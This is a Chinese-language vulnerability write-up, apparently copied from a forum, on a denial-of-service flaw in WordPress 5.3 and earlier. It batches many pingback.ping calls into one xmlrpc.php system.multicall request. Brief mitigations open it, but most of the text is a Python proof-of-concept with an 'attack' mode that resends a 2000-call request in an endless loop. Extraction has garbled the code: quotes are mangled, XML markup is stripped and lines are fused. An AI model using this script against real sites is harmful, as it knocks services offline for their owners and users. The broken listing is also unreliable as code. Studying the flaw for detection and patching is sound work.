WordPress <=5.3.0 xmlrpc.php拒绝服务漏洞

# WordPress <=5.3.0 xmlrpc.php拒绝服务漏洞

> 原文:[https://www.zhihuifly.com/t/topic/3267](https://www.zhihuifly.com/t/topic/3267)

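# WordPress <=5.3.0 xmlrpc.php拒绝服务漏洞

## 一、漏洞简介

xmlrpc.php 支持通过 system.multicall 在一次请求中批量调用多个方法;下方 PoC 在单个请求体中重复打包大量 pingback.ping 调用,使服务器在一次请求内承担成倍的处理开销,从而造成拒绝服务。

## 二、漏洞影响

WordPress <= 5.3

缓解措施:升级到受影响范围之外的版本;站点不需要时禁用 xmlrpc.php 或 pingback 功能;对发往 xmlrpc.php 的 POST 请求做限速并限制请求体大小。

## 三、复现过程

漏洞文件

```
/wordpress/xmlrpc.php
/wp/xmlrpc.php
```

```
from urllib.parse import urlparse import sys, uuid, urllib3, requests urllib3.disable_warnings() DEBUG = True def dprint(X): if DEBUG: print(X) COUNT=0 def build_entry(pingback,target): global COUNT COUNT +=1 entry = “methodNamepingback.ping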

entry += f”params{pingback}/{COUNT}

#entry += f”params{pingback}/{uuid.uuid4()}

entry += f”{target}/?p=1

#entry += f”{target}/#e” # taxes DB more

return entry

# Assemble one XML-RPC request body that batches `entries` calls.
#
# pingback, target: URL strings passed through unchanged to build_entry().
# entries: how many build_entry() results are appended between prefix and suffix.
# Returns the concatenated request string.
#
# NOTE(review): the prefix/suffix literals look truncated in this listing (the
# prefix has no closing quote and the suffix is empty); the XML markup was
# presumably stripped when the page was extracted, so the code is not valid as shown.
# Defender's view: one system.multicall body that repeats the same pingback.ping
# member many times is the pattern to alert on or reject at xmlrpc.php.
def build_request(pingback,target,entries):

prefix = “system.multicall

suffix = “”

request = prefix

# Each iteration appends one more entry; build_entry() also bumps the global COUNT.
for _ in range(0,entries): request += build_entry(pingback,target)

request += suffix

return request

# Print the usage line for this script and terminate with exit status 1.
#
# NOTE(review): the text after the script name is empty in this listing; the
# argument placeholders were presumably lost in extraction. get_args() expects
# three arguments: an action, a pingback URL and a target URL.
def usage_die():

print(f”[!] Usage: {sys.argv[0]} “)

exit(1)

# Read and validate the three command-line arguments.
#
# Returns the tuple (action, pingback, target). Any validation failure calls
# usage_die(), which exits with status 1.
def get_args():

# Exactly three arguments are required after the script name.
if len(sys.argv) != 4: usage_die()

action = sys.argv[1]

pingback = sys.argv[2]

target = sys.argv[3]

# Only the two modes handled by main() are accepted.
if action not in (“check”,“attack”): usage_die()

# Both URLs must parse with a scheme and a network location; nothing else
# about them (host, path, reachability) is checked here.
for URL in (pingback,target):

res = urlparse(URL)

if not all((res.scheme,res.netloc)): usage_die()

return (action,pingback,target)

# Build the batched request and send it to {target}/xmlrpc.php in one of two modes.
#
# action: "check" builds 2 entries and sends a single request, then dumps the
#         response; "attack" builds 2000 entries and re-sends the same body in
#         a loop until interrupted.
# pingback, target: URL strings forwarded to build_request().
#
# NOTE(review): indentation and several literals were damaged by the page
# extraction (curly quotes, two print calls fused on one line, the
# `__name__ == "__main__"` guard rendered as bold markdown), so the listing
# does not run as shown.
# Defender's view: this shows up in access logs as POSTs to /xmlrpc.php with an
# unusually large body; in attack mode the same body repeats at a high rate.
# Rate limiting and body-size limits on xmlrpc.php, or disabling it where
# unused, address both signals.
def main(action,pingback,target):

print(“[>] WordPress <= 5.3.? Denial-of-Service PoC") print("[>] @roddux 2019 | Arcturus Security | [labs.arcturus.net](http://labs.arcturus.net)”)

# he checc

if action == “check”: entries = 2

# he attacc

elif action == “attack”: entries = 2000

# but most importantly

print(f”[+] Running in {action} mode”)

# he pingbacc

print(f”[+] Got pingback URL “{pingback}””)

print(f”[+] Got target URL “{target}””)

print(f”[+] Building {entries} pingback calls”)

# entries = 1000 # TESTING

xmldata = build_request(pingback,target,entries)

# The full request body is echoed only when the module-level DEBUG flag is set.
dprint(“[+] Request:\n”)

dprint(xmldata+”\n”)

print(f”[+] Request size: {len(xmldata)} bytes”)

if action == “attack”:

print(“[+] Starting attack loop, CTRL+C to stop…”)

rcount = 0

try:

while True:

try:

# verify=False turns off TLS certificate validation and redirects are not
# followed; the client gives up on each response after 0.2 s.
resp = requests.post(f”{target}/xmlrpc.php”, xmldata, verify=False, allow_redirects=False, timeout=.2)

#dprint(resp.content.decode(“UTF-8”)[0:500]+”\n”)

# A non-200 status is only reported; it is not treated as a stop condition.
if resp.status_code != 200:

print(f”[!] Received odd status ({resp.status_code}) – DoS successful?”)

# Timeouts and connection errors are ignored here.
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:

pass

# presumably still inside the while loop (indentation lost) — counts requests sent
rcount += 1

print(f”\r[+] Requests sent: {rcount}”,end=””)

# CTRL+C is the only exit path visible for the loop; the script then exits with status 0.
except KeyboardInterrupt:

print(“\n[>] Attack finished”,end=”\n\n”)

exit(0)

elif action == “check”:

print(“[+] Sending check request”)

try:

# Single request with a 10 s timeout; TLS certificate validation is disabled here too.
resp = requests.post(f”{target}/xmlrpc.php”, xmldata, verify=False, allow_redirects=False, timeout=10)

if resp.status_code != 200:

print(f”[!] Received odd status ({resp.status_code}) – check target url”)

print(“[+] Request sent”)

print(“[+] Response headers:\n”)

print(resp.headers)

print(“[+] Response dump:”)

print(resp.content.decode(“UTF-8”))

# No verdict is computed: the response is printed and interpretation is left to the reader.
print(“[+] Here’s the part where you figure out if it’s vulnerable, because I CBA to code it”)

except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:

print(“[!] Connection error”)

exit(1)

# The script entry guard is fused onto the next line; it calls main() with the tuple from get_args().
print(“[>] Check finished”) `if **name** == “**main**”:

main(*get_args())`
```
